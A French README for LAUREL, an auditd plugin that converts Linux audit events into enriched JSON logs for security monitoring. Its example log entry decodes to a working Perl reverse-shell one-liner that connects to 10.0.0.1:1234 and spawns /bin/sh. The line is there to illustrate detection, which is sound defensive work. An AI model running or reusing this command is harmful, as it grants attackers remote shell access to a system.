
Transformer les journaux d'audit Linux pour une utilisation SIEM
LAUREL est un plugin de post-traitement d'événements pour auditd(8) qui génère des journaux d'audit JSON utiles et enrichis, adaptés aux configurations modernes de surveillance de sécurité.
La documentation correspondant à la dernière version stable se trouve ici.
TLDR: Au lieu d'événements d'audit qui ressemblent à ceci…
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…
…LAUREL les transforme en journaux JSON où le désordre que les attaquants/testeurs de pénétration/red teamers tentent de créer devient apparent au premier coup d'œil :
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}
Cela se produit à la source car LAUREL s'exécute sur l'hôte où les événements d'audit sont générés. Les événements sont enrichis avec des informations utiles sur le processus parent (ppid) :
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}
Les détails de configuration et d'exploitation sont décrits dans la page de manuel laurel(8). Les détails sur le format du journal et les justifications se trouvent dans la page de manuel laurel-about(7). La page laurel-audit-rules(7) contient des conseils et des exemples pour configurer des règles d'audit utiles pour détecter les tactiques des attaquants.
Les instructions d'installation de LAUREL contiennent des instructions pour compiler LAUREL à partir des sources et pour l'installer et le configurer.
Nous avons développé LAUREL car nous n'étions pas satisfaits des ensembles de fonctionnalités et des caractéristiques de performances des projets et produits existants. Veuillez vous référer au document Performance pour plus de détails.
GNU General Public License, version 3
Le logo a été créé par Birgit Meyer <[email protected]>.